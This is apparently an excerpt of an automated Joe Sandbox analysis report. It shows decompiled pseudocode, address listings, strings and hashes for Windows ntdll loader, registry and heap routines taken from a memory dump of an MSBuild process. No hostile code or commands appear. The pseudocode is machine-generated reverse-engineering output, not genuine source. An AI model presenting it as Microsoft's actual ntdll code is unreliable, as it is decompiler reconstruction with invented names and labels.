                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b896a
                                                                                                0x010b896b
                                                                                                0x010b896e
                                                                                                0x00000000
                                                                                                0x010b8970
                                                                                                0x010b8970
                                                                                                0x010b8970
                                                                                                0x010b8970
                                                                                                0x010b8972
                                                                                                0x010b8972
                                                                                                0x010b8974
                                                                                                0x00000000
                                                                                                0x010b897a
                                                                                                0x010b897a
                                                                                                0x010b897d
                                                                                                0x00000000
                                                                                                0x010b8983
                                                                                                0x01109c65
                                                                                                0x01109c6d
                                                                                                0x01109c72
                                                                                                0x01109c75
                                                                                                0x01109c75
                                                                                                0x01109c82
                                                                                                0x01109c86
                                                                                                0x01109c87
                                                                                                0x01109c88
                                                                                                0x01109c89
                                                                                                0x01109c8c
                                                                                                0x01109c90
                                                                                                0x01109c95
                                                                                                0x01109c97
                                                                                                0x01109ca0
                                                                                                0x01109ca3
                                                                                                0x01109ca9
                                                                                                0x01109ca9
                                                                                                0x00000000
                                                                                                0x01109ca9
                                                                                                0x01109ca3
                                                                                                0x00000000
                                                                                                0x01109c97
                                                                                                0x010b897d
                                                                                                0x00000000
                                                                                                0x010b8974
                                                                                                0x010b8988
                                                                                                0x010b8992
                                                                                                0x010b8996
                                                                                                0x00000000
                                                                                                0x010b8996
                                                                                                0x010b894c
                                                                                                0x00000000
                                                                                                0x010b8870
                                                                                                0x010b887b
                                                                                                0x010b887d
                                                                                                0x010b887f
                                                                                                0x010b8881
                                                                                                0x010b8884
                                                                                                0x010b8884
                                                                                                0x010b8886
                                                                                                0x010b8889
                                                                                                0x010b888c
                                                                                                0x010b888e
                                                                                                0x010b8891
                                                                                                0x010b8891
                                                                                                0x010b8898
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b889a
                                                                                                0x010b889b
                                                                                                0x010b889e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b88a0
                                                                                                0x010b88a8
                                                                                                0x010b88b0
                                                                                                0x010b88b2
                                                                                                0x010b88d3
                                                                                                0x010b88d5
                                                                                                0x00000000
                                                                                                0x010b88d7
                                                                                                0x010b88db
                                                                                                0x010b88dc
                                                                                                0x010b88e0
                                                                                                0x010b88e8
                                                                                                0x010b88ee
                                                                                                0x010b88f0
                                                                                                0x010b88f3
                                                                                                0x010b88fc
                                                                                                0x010b8901
                                                                                                0x010b8906
                                                                                                0x010b890c
                                                                                                0x010b890c
                                                                                                0x010b890f
                                                                                                0x010b8916
                                                                                                0x010b8917
                                                                                                0x010b8918
                                                                                                0x010b8919
                                                                                                0x010b891a
                                                                                                0x010b891f
                                                                                                0x010b8921
                                                                                                0x01109c52
                                                                                                0x01109c55
                                                                                                0x01109c5b
                                                                                                0x01109cac
                                                                                                0x01109cc0
                                                                                                0x01109cc0
                                                                                                0x01109c55
                                                                                                0x010b8927
                                                                                                0x010b8927
                                                                                                0x010b892f
                                                                                                0x010b8933
                                                                                                0x00000000
                                                                                                0x010b88f5
                                                                                                0x010b88f5
                                                                                                0x00000000
                                                                                                0x010b88f7
                                                                                                0x010b88f7
                                                                                                0x010b88fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b88fa
                                                                                                0x010b88f5
                                                                                                0x010b88f3
                                                                                                0x00000000
                                                                                                0x010b88d5
                                                                                                0x00000000
                                                                                                0x010b88b2
                                                                                                0x010b88c9
                                                                                                0x00000000
                                                                                                0x010b88c9
                                                                                                0x010b887f
                                                                                                0x010b886a
                                                                                                0x010b8857
                                                                                                0x010b8852
                                                                                                0x010b88bf
                                                                                                0x010b88bf
                                                                                                0x010b87aa
                                                                                                0x010b87ad
                                                                                                0x010b87ae
                                                                                                0x010b87b4
                                                                                                0x010b87b5
                                                                                                0x010b87b6
                                                                                                0x010b87b8
                                                                                                0x010b87bd
                                                                                                0x010b87c1
                                                                                                0x010b87f4
                                                                                                0x010b87fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b87c1
                                                                                                0x00000000

                                                                                                Strings
                                                                                                • LdrpDoPostSnapWork, xrefs: 01109C1E
                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01109C18
                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01109C28
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                • API String ID: 2994545307-1948996284
                                                                                                • Opcode ID: 0a61d5b0d93a11ee4618f1db4b8146bfcd05f5873dfe70e9ce5e6f23245e66f6
                                                                                                • Instruction ID: 4f6e652a3318886e91bba6484e81284becdd125fddb14ccfd9216092c606cc17
                                                                                                • Opcode Fuzzy Hash: 0a61d5b0d93a11ee4618f1db4b8146bfcd05f5873dfe70e9ce5e6f23245e66f6
                                                                                                • Instruction Fuzzy Hash: 2E910531A0021AEFDF59DF59D4C09FA77F9FF44314B0481AADA85AB261DB31E901CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010B7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 98%
                                                                                                			E010B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E010BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E010AC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1195780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01125510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1195780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E010C7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E010C7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01127016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E010C7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E010C7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01127016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E010DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E010AB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                0x010b7e4c
                                                                                                0x010b7e50
                                                                                                0x010b7e55
                                                                                                0x010b7e58
                                                                                                0x010b7e5d
                                                                                                0x010b7e71
                                                                                                0x010b7f33
                                                                                                0x010b7e77
                                                                                                0x010b7e77
                                                                                                0x010b7e79
                                                                                                0x010b7e79
                                                                                                0x010b7e7e
                                                                                                0x010b7f45
                                                                                                0x01109848
                                                                                                0x00000000
                                                                                                0x01109848
                                                                                                0x010b7f4e
                                                                                                0x010b7f53
                                                                                                0x010b7f5a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110985a
                                                                                                0x01109862
                                                                                                0x01109866
                                                                                                0x00000000
                                                                                                0x0110986c
                                                                                                0x00000000
                                                                                                0x0110986c
                                                                                                0x010b7e84
                                                                                                0x010b7e84
                                                                                                0x010b7e8d
                                                                                                0x01109871
                                                                                                0x010b7eb8
                                                                                                0x010b7ec0
                                                                                                0x010b7ec0
                                                                                                0x010b7e9a
                                                                                                0x0110987e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01109884
                                                                                                0x0110988b
                                                                                                0x011098a7
                                                                                                0x011098ac
                                                                                                0x011098b1
                                                                                                0x011098b6
                                                                                                0x011098b8
                                                                                                0x011098b8
                                                                                                0x011098b9
                                                                                                0x00000000
                                                                                                0x011098b9
                                                                                                0x010b7ea0
                                                                                                0x010b7ea7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b7eac
                                                                                                0x010b7eb1
                                                                                                0x010b7ec6
                                                                                                0x010b7ed0
                                                                                                0x011098cc
                                                                                                0x010b7ed6
                                                                                                0x010b7ed6
                                                                                                0x010b7ed6
                                                                                                0x010b7ede
                                                                                                0x010b7ee3
                                                                                                0x011098e3
                                                                                                0x011098f0
                                                                                                0x01109902
                                                                                                0x011098f2
                                                                                                0x011098fb
                                                                                                0x011098fb
                                                                                                0x01109907
                                                                                                0x0110991d
                                                                                                0x0110991d
                                                                                                0x01109907
                                                                                                0x011098e3
                                                                                                0x010b7ef0
                                                                                                0x010b7f14
                                                                                                0x010b7f14
                                                                                                0x010b7f1e
                                                                                                0x01109946
                                                                                                0x010b7f24
                                                                                                0x010b7f24
                                                                                                0x010b7f24
                                                                                                0x010b7f2c
                                                                                                0x0110996a
                                                                                                0x01109975
                                                                                                0x01109975
                                                                                                0x0110997e
                                                                                                0x01109993
                                                                                                0x01109993
                                                                                                0x0110997e
                                                                                                0x00000000
                                                                                                0x010b7ef2
                                                                                                0x010b7efc
                                                                                                0x010b7f0a
                                                                                                0x010b7f0e
                                                                                                0x01109933
                                                                                                0x00000000
                                                                                                0x01109933
                                                                                                0x00000000
                                                                                                0x010b7f0e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b7eb1

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 011098A2
                                                                                                • LdrpCompleteMapModule, xrefs: 01109898
                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01109891
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                • API String ID: 0-1676968949
                                                                                                • Opcode ID: 48bfc03362db9fad05c6a4854a8391179ee9fea81e5dc21fbf2d712b4ef83048
                                                                                                • Instruction ID: bbc01f7dd3f990ca046521d20f9ef5149083e894309f08526b5f88111853cfe0
                                                                                                • Opcode Fuzzy Hash: 48bfc03362db9fad05c6a4854a8391179ee9fea81e5dc21fbf2d712b4ef83048
                                                                                                • Instruction Fuzzy Hash: B0513731A0474ADBE726CB5CC9C4BAA7BE0EF88314F040599E9A19B3D2D770ED00CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010AE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E010AE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E010AF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E010E95D0();
						}
						if(_t78 != 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E010EFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E010EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E010E9600();
					if(_t97 < 0) {
						goto L6;
					}
					E010EBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L010AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E010EBB40(_t83, _t102 + 0x24, _t78);
								if(L010B43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E010EBB40(_t84, _t102 + 0x24, _t94);
									if(L010B43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                0x010ae620
                                                                                                0x010ae628
                                                                                                0x010ae62f
                                                                                                0x010ae631
                                                                                                0x010ae635
                                                                                                0x010ae637
                                                                                                0x010ae63e
                                                                                                0x01105503
                                                                                                0x01105503
                                                                                                0x010ae64c
                                                                                                0x010ae64c
                                                                                                0x010ae651
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010ae661
                                                                                                0x010ae665
                                                                                                0x0110542a
                                                                                                0x010ae715
                                                                                                0x010ae71a
                                                                                                0x010ae71c
                                                                                                0x010ae720
                                                                                                0x010ae720
                                                                                                0x010ae727
                                                                                                0x010ae736
                                                                                                0x010ae736
                                                                                                0x010ae743
                                                                                                0x010ae743
                                                                                                0x010ae673
                                                                                                0x010ae678
                                                                                                0x010ae67d
                                                                                                0x010ae682
                                                                                                0x010ae685
                                                                                                0x010ae692
                                                                                                0x010ae69b
                                                                                                0x010ae6a3
                                                                                                0x010ae6ad
                                                                                                0x010ae6b1
                                                                                                0x010ae6b2
                                                                                                0x010ae6bb
                                                                                                0x010ae6bf
                                                                                                0x010ae6c0
                                                                                                0x010ae6c8
                                                                                                0x010ae6cc
                                                                                                0x010ae6d5
                                                                                                0x010ae6d9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010ae6e5
                                                                                                0x010ae6ea
                                                                                                0x010ae6f9
                                                                                                0x010ae70b
                                                                                                0x010ae70f
                                                                                                0x01105439
                                                                                                0x0110545e
                                                                                                0x0110545e
                                                                                                0x00000000
                                                                                                0x0110545e
                                                                                                0x0110543b
                                                                                                0x0110543e
                                                                                                0x01105440
                                                                                                0x01105445
                                                                                                0x01105472
                                                                                                0x01105475
                                                                                                0x0110548d
                                                                                                0x01105493
                                                                                                0x011054a9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x011054ab
                                                                                                0x011054b4
                                                                                                0x011054bc
                                                                                                0x011054c8
                                                                                                0x011054de
                                                                                                0x011054fb
                                                                                                0x011054e0
                                                                                                0x011054e6
                                                                                                0x011054eb
                                                                                                0x011054eb
                                                                                                0x011054de
                                                                                                0x00000000
                                                                                                0x011054bc
                                                                                                0x01105477
                                                                                                0x0110547a
                                                                                                0x01105480
                                                                                                0x01105483
                                                                                                0x01105486
                                                                                                0x0110548b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110548b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01105447
                                                                                                0x01105447
                                                                                                0x01105447
                                                                                                0x01105447
                                                                                                0x0110544e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01105450
                                                                                                0x01105452
                                                                                                0x01105455
                                                                                                0x0110545a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0110545c
                                                                                                0x0110546a
                                                                                                0x0110546d
                                                                                                0x0110546f
                                                                                                0x00000000
                                                                                                0x0110546f
                                                                                                0x010ae70f

                                                                                                Strings
                                                                                                • InstallLanguageFallback, xrefs: 010AE6DB
                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010AE68C
                                                                                                • @, xrefs: 010AE6C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                • API String ID: 0-1757540487
                                                                                                • Opcode ID: d6354d54cf287c869252f691c2a19aec42add280ce23ab2844e07425d4545266
                                                                                                • Instruction ID: 368723e978dc3db12a3eb81302c6dafa93033bca77cac88073602b60ccb67df4
                                                                                                • Opcode Fuzzy Hash: d6354d54cf287c869252f691c2a19aec42add280ce23ab2844e07425d4545266
                                                                                                • Instruction Fuzzy Hash: EE51E4729083069BD715EF68C444AAFB7E9BF88614F45092EF9C5D7290F770DA04CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0113FF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0113FF60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                • API String ID: 3446177414-1911121157
                                                                                                • Opcode ID: 3da23a91839fd3fd682fe2095256bf12f939ac9f026d722c26b88ebf035dc8d3
                                                                                                • Instruction ID: f84fccdc736e74656ffbad2b423a9514795b36de67bd0a5e20ae9086b4a39bca
                                                                                                • Opcode Fuzzy Hash: 3da23a91839fd3fd682fe2095256bf12f939ac9f026d722c26b88ebf035dc8d3
                                                                                                • Instruction Fuzzy Hash: 83116672910145EFDF2AEF54C849FD87BB1FF48704F108058F6086B1A0C7389944DB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0116E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 60%
                                                                                                			E0116E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0116BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0116BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0116AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E010E9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0116A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0116A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E010E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0116A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0116A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E010C2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E010BB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E010BFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E010C7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0115FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                0x0116e547
                                                                                                0x0116e549
                                                                                                0x0116e54f
                                                                                                0x0116e553
                                                                                                0x0116e557
                                                                                                0x0116e55a
                                                                                                0x0116e55c
                                                                                                0x0116e55f
                                                                                                0x0116e561
                                                                                                0x0116e567
                                                                                                0x0116e56b
                                                                                                0x0116e7e2
                                                                                                0x00000000
                                                                                                0x0116e571
                                                                                                0x0116e575
                                                                                                0x0116e577
                                                                                                0x0116e57b
                                                                                                0x0116e57c
                                                                                                0x0116e57d
                                                                                                0x0116e57e
                                                                                                0x0116e57f
                                                                                                0x0116e588
                                                                                                0x0116e58f
                                                                                                0x0116e591
                                                                                                0x0116e592
                                                                                                0x0116e592
                                                                                                0x0116e596
                                                                                                0x0116e59e
                                                                                                0x0116e5a0
                                                                                                0x0116e5a6
                                                                                                0x0116e61d
                                                                                                0x0116e61d
                                                                                                0x0116e621
                                                                                                0x0116e623
                                                                                                0x0116e630
                                                                                                0x0116e630
